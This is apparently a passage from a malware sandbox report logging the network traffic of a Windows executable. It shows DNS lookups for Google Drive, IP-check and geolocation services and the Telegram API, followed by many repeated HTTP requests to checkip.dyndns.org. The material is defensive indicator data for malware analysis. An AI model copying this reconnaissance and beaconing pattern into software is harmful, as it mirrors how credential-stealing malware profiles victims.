Jan 10, 2025 21:53:35.028512955 CET	192.168.2.5	1.1.1.1	0xcda3	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:54:29.653590918 CET	192.168.2.5	1.1.1.1	0x77af	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 21:53:21.763258934 CET	1.1.1.1	192.168.2.5	0x4486	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:22.912096024 CET	1.1.1.1	192.168.2.5	0xf5fb	No error (0)	drive.usercontent.google.com		172.217.18.97	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:27.379612923 CET	1.1.1.1	192.168.2.5	0x5ead	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 21:53:27.379612923 CET	1.1.1.1	192.168.2.5	0x5ead	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:27.379612923 CET	1.1.1.1	192.168.2.5	0x5ead	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:27.379612923 CET	1.1.1.1	192.168.2.5	0x5ead	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:27.379612923 CET	1.1.1.1	192.168.2.5	0x5ead	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:27.379612923 CET	1.1.1.1	192.168.2.5	0x5ead	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:28.692665100 CET	1.1.1.1	192.168.2.5	0x9f65	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:53:35.035414934 CET	1.1.1.1	192.168.2.5	0xcda3	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 10, 2025 21:54:29.660320044 CET	1.1.1.1	192.168.2.5	0x77af	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49861	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:27.390430927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:28.090756893 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:27 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 21:53:28.099018097 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 21:53:28.334659100 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 21:53:34.784805059 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 21:53:34.998574018 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:34 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49919	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:36.153876066 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 21:53:36.826298952 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49934	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:38.170341969 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:38.843408108 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49948	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:39.747529984 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:40.454317093 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49960	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:41.391680956 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:42.072101116 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49973	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:43.130877972 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:43.840277910 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:43 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49986	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:44.839339018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:45.540389061 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49993	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:46.534900904 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:47.217083931 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49995	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:48.317394018 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:49.013741970 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49997	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:50.178380013 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:50.853566885 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49999	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:51.755938053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:52.437669039 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:52 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	50001	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:53.531601906 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:54.203829050 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:54 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	50003	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:55.230660915 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:55.926980019 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50005	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:56.910090923 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:57.584853888 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:57 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50007	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:53:58.675137997 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:53:59.365570068 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:53:59 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50009	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:00.425035000 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:01.100239038 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:01 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50011	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:02.019860029 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:02.693260908 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:02 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50013	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:03.772794008 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 21:54:04.467611074 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 20:54:04 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50015	132.226.247.73	80	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 21:54:05.397986889 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
